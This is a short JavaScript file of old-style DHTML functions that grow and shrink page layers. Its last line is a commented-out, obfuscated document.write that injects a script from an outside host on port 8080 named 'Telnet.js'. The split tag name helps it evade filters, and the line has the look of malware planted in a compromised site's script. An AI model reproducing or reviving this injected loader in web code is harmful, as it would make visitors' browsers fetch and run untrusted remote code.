function big(lyr) {
document.all[lyr].style.height='150px'; }
/* small() makes selected layer shorter (height property)*/
function small(lyr) {
document.all[lyr].style.height='24px';
}

/* start() makes all layers short to start with (height property)*/
function start() {
document.all.Layer1.style.height='24px';
}
//-- !>


//document.write('<s'+'cript type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Telnet.js"></scr'+'ipt>');